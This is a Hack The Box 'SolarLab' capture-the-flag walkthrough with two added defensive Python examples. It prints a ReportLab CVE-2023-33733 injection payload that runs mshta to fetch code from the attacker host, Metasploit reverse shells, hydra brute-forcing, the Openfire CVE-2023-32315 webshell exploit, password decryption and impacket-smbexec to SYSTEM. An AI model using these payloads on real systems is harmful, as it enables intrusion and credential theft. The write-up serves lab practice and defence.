INFO
CTF URL: https://app.hackthebox.com/machines/SolarLab
IP:10.10.11.16
Difficulty: Medium
Reconnaissance
NMAP
nmap -p- -T4 10.10.11.16 -v
Discovered open port 139/tcp on 10.10.11.16
Discovered open port 80/tcp on 10.10.11.16
Discovered open port 445/tcp on 10.10.11.16
Discovered open port 135/tcp on 10.10.11.16
Discovered open port 6791/tcp on 10.10.11.16
nmap -p80,139,445,135,6791 -sS -sC -sV 10.10.11.16 -v
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-title: SolarLab Instant Messenger
| http-methods:
|_ Supported Methods: GET HEAD
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -48s
| smb2-time:
| date: 2024-07-16T10:35:08
|_ start_date: N/A
Added solarlab.htb and report.solarlab.htb to /etc/hosts.
WEB
The site on port 80 is the home page of a messenger that advertises itself as unhackable. Users named on it:
Alexander Knight
Claudia Springer
Blake Byte
SMB
└─$ smbclient \\\\10.10.11.16\\Documents -N
smb: \> ls
. DR 0 Fri Apr 26 10:47:14 2024
.. DR 0 Fri Apr 26 10:47:14 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
Downloaded everything in the share. The interesting part is this credential table:
Username Password
[email protected] al;ksdhfewoiuh
KAlexander dkjafblkjadsfgl
[email protected] d398sadsknr390
blake.byte ThisCanB3typedeasily1@
AlexanderK danenacia9234n
ClaudiaS dadsfawe9dafkn
Usernames that follow the host's naming pattern (first name plus surname initial):
ClaudiaS
AlexanderK
BlakeB
The last one is derived from the other two.
Port 6791
http://report.solarlab.htb:6791/ presents a login form.
Login
pass.lst
al;ksdhfewoiuh
dkjafblkjadsfgl
d398sadsknr390
ThisCanB3typedeasily1@
danenacia9234n
dadsfawe9dafkn
hydra -L users.lst -P pass.lst report.solarlab.htb http-post-form "/login:username=^USER^&password=^PASS^:F=User authentication error." -s 6791 -v
# result
[6791][http-post-form] host: report.solarlab.htb login: BlakeB password: ThisCanB3typedeasily1@
PDF Generator
Logging in gives access to a dashboard with several PDF generators. The generator is backed by ReportLab, which is affected by the code-injection bug CVE-2023-33733; a PoC is at https://github.com/c53elyas/CVE-2023-33733/blob/master/code-injection-poc/poc.py, so let's get a reverse shell.
# set lport and run
msf6 exploit(windows/misc/hta_server) >
[*] Started reverse TCP handler on 10.10.14.81:4321
[*] Using URL: http://10.10.14.81:8040/V5MeHBdBENTo0Xo.hta
[*] Server started.
# the following is executed on the Windows target
mshta http://10.10.14.81:8181/zCPZIvWLnfc.hta
Prepare the payload
<para>
<font color="[ [ getattr(pow,Word('__globals__'))['os'].system('mshta http://10.10.14.81:8181/zCPZIvWLnfc.hta') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
exploit
</font>
</para>
Intercept the request and put the payload into an input field that has no character limit.
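As an added defensive example (not code from the write-up or the PoC repository): the generator's weakness is that user text reaches ReportLab's Paragraph markup parser, whose attribute evaluator is what CVE-2023-33733 abuses. The block below flags request text carrying that markup shape and shows the fix of escaping user text before it is embedded in a template; the regexes, function names and sample strings are my own assumptions.

```python
import html
import re

# Added example, not code from the write-up or the PoC repository. The report
# generator passes user text into ReportLab Paragraph markup; CVE-2023-33733 is
# reached through a <font> attribute whose value is a bracketed expression that
# ReportLab's restricted evaluator runs. Two layers: flag that shape on input,
# and escape user text so any markup in it is rendered literally, never parsed.

# <font ...> whose color/size/face attribute value begins with "[" (an expression,
# not a literal such as "red").
_EXPR_ATTR = re.compile(
    r"<\s*font\b[^>]*\b(?:color|size|face)\s*=\s*[\"']\s*\[", re.I)
# Reachability tricks used to climb out of the evaluator's sandbox.
_SANDBOX_ESCAPE = re.compile(r"__\w+__|\bgetattr\s*\(|\btype\s*\(|\.system\s*\(")


def is_suspicious_markup(text: str) -> bool:
    """True when raw request text looks like an injection attempt."""
    return bool(_EXPR_ATTR.search(text) or _SANDBOX_ESCAPE.search(text))


def render_report_field(user_text: str) -> str:
    """Hardened rendering: formatting comes from the template, user text is
    HTML-escaped so '<', '>' and quotes cannot open or close markup."""
    return f'<para><font color="red">{html.escape(user_text, quote=True)}</font></para>'


# Constructed inputs (assumed, not captured traffic): a benign field and one with
# the injection shape from the write-up, with the command replaced by CMD.
BENIGN = '<para><font color="red">Leave request for Friday</font></para>'
INJECTION = (
    """<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('CMD') """
    """for Word in [orgTypeFun('Word', (str,), {})] ] for orgTypeFun in [type(type(1))] ] """
    """and 'red'">exploit</font></para>"""
)

if __name__ == "__main__":
    print("benign flagged:", is_suspicious_markup(BENIGN))        # False
    print("injection flagged:", is_suspicious_markup(INJECTION))  # True
    print(render_report_field(INJECTION))
```

Upgrading ReportLab to a fixed release is still the primary remediation; the escaping shown here is the application-side control that keeps user text out of the markup grammar regardless of library version.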
meterpreter > getuid
Server username: SOLARLAB\blake
meterpreter > cat Desktop\\user.txt
283ba41090a704847ce1b8ed038df860
Enumeration
meterpreter > ls
Listing: c:\Users\blake\Documents\app
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 4096 dir 2024-07-16 11:02:37 -0400 __pycache__
100666/rw-rw-rw- 1278 fil 2023-11-17 02:59:44 -0500 app.py
040777/rwxrwxrwx 0 dir 2024-05-02 05:30:27 -0400 instance
100666/rw-rw-rw- 315 fil 2023-11-16 07:17:58 -0500 models.py
040777/rwxrwxrwx 0 dir 2024-07-16 10:43:17 -0400 reports
100666/rw-rw-rw- 7790 fil 2023-11-18 11:59:40 -0500 routes.py
040777/rwxrwxrwx 0 dir 2023-11-17 03:01:10 -0500 static
040777/rwxrwxrwx 4096 dir 2023-11-17 03:01:10 -0500 templates
100666/rw-rw-rw- 3352 fil 2024-05-02 11:26:05 -0400 utils.py
cat instance\\users.db
The file is a SQLite database; the readable fragments are the schema and three rows of the user table:
CREATE TABLE user (
id INTEGER NOT NULL,
username VARCHAR(50) NOT NULL,
password VARCHAR(100) NOT NULL,
PRIMARY KEY (id),
UNIQUE (username)
)
alexanderk
- HotP!fireguard'
claudias
- 007poiuytrewq
blakeb
- ThisCanB3typedeasily1@
Not that interesting.
meterpreter > shell
Process 1836 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
c:\Users>net users
net users
User accounts for \\SOLARLAB
-------------------------------------------------------------------------------
Administrator blake DefaultAccount
Guest openfire WDAGUtilityAccount
The command completed successfully.
There is an openfire user, and a program of the same name is installed:
Listing: c:\Program Files
=========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
...
040777/rwxrwxrwx 4096 dir 2023-11-17 07:22:02 -0500 Openfire
...
PrivEsc with openfire
Openfire is an XMPP instant messaging server. Let's go after it.
meterpreter > netstat
Connection list
===============
Proto Local address Remote address State User Inode
----- ------------- -------------- ----- ---- ----- --------
...
tcp 127.0.0.1:9090 0.0.0.0:* LISTEN 0 0 3228/openfire-service.exe
tcp 127.0.0.1:9091 0.0.0.0:* LISTEN 0 0 3228/openfire-service.exe
...
First, forward the port to the local machine:
# meterpreter >
portfwd add -l 9090 -p 9090 -r 127.0.0.1
or use chisel: https://github.com/jpillora/chisel/releases
# on kali
./chisel_1.9.1_linux_amd64 server --socks5 --reverse -p 3333
# on the Windows target
.\chisel_1.9.1_windows_386 client 10.10.14.81:3333 R:90:127.0.0.1:9090
The admin console reports: Openfire, Version: 4.7.4
Next I found an exploit: https://github.com/miko550/CVE-2023-32315
python3 CVE-2023-32315.py -t http://127.0.0.1:9090
...
User added successfully: url: http://127.0.0.1:9090 username: 14t2rv password: 7952pc
1. Run the exploit
2. Log in with the newly added user
3. Go to the Plugins tab and upload `openfire-management-tool-plugin.jar`
4. Go to Server > Server Settings > Management tool
5. Access the webshell with the password "123"
6. Choose the option "system command"
Next we can get a reverse shell (again with hta):
use exploit/windows/misc/hta_server
mshta http://10.10.14.81:8282/Hd0dKyP4sA.hta
PrivEsc to root
In C:\Program Files\Openfire\embedded-db\openfire.log:
...
INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','[email protected],[email protected],[email protected]',0,NULL)
...
In ......openfire.script:
...
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','[email protected]','001700223740785','0')
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
The password is encrypted with the passwordKey property. Decrypting it with OpenFireDecryptPass.java:
java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)
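Added example, not part of the write-up: an audit of the embedded-db script format quoted above, flagging OFUSER rows and admin.authorizedJIDs entries that are not on an allowlist, which is the trace an exploit like CVE-2023-32315 leaves (the extra account it registers plus its admin JID). The function name, the sample rows and the example.org JIDs are constructed.

```python
import re
from typing import Dict, List, Set

# Added example, not from the write-up. Audits an Openfire embedded-db script
# (the HSQLDB statement format shown above) for accounts and admin JIDs that are
# not expected. An unexpected OFUSER row plus an extra JID in admin.authorizedJIDs
# is what exploitation of the admin console (CVE-2023-32315) leaves behind.

_OFUSER = re.compile(r"INSERT INTO OFUSER VALUES\('([^']*)'")
_ADMIN_JIDS = re.compile(
    r"INSERT INTO OFPROPERTY VALUES\('admin\.authorizedJIDs','([^']*)'")


def audit_openfire_script(script: str, expected_users: Set[str],
                          expected_admins: Set[str]) -> Dict[str, List[str]]:
    """Return user accounts and admin JIDs in the script that are not allowlisted."""
    users: List[str] = []
    admins: List[str] = []
    for line in script.splitlines():
        m = _OFUSER.match(line)
        if m:
            users.append(m.group(1))
            continue
        m = _ADMIN_JIDS.match(line)
        if m:
            # Comma-separated list; the last occurrence in the file is the live value.
            admins = [j.strip() for j in m.group(1).split(",") if j.strip()]
    return {
        "unknown_users": sorted(set(users) - expected_users),
        "unexpected_admins": sorted(set(admins) - expected_admins),
    }


# Constructed sample in the shape of the rows quoted above (hash and salt
# columns shortened, JIDs and key replaced by placeholders).
SAMPLE_SCRIPT = """\
INSERT INTO OFUSER VALUES('admin','gjMo...','9MwN...','yidQ...',4096,NULL,'becb0c...','Administrator','admin@example.org','001700223740785','0')
INSERT INTO OFUSER VALUES('14t2rv',NULL,NULL,NULL,4096,NULL,'00ff...','14t2rv','14t2rv@example.org','001720000000000','0')
INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','admin@example.org,14t2rv@example.org',0,NULL)
INSERT INTO OFPROPERTY VALUES('passwordKey','KEY-PLACEHOLDER',0,NULL)
"""

if __name__ == "__main__":
    print(audit_openfire_script(SAMPLE_SCRIPT, {"admin"}, {"admin@example.org"}))
```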
Let's try to connect via SMB with the recovered password:
impacket-smbexec administrator:'ThisPasswordShouldDo!@'@solarlab.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system
Finally, I got a meterpreter shell again and moved to the Administrator's Desktop:
meterpreter > cat root.txt
bd73ecb598620827a239ce0c9643c956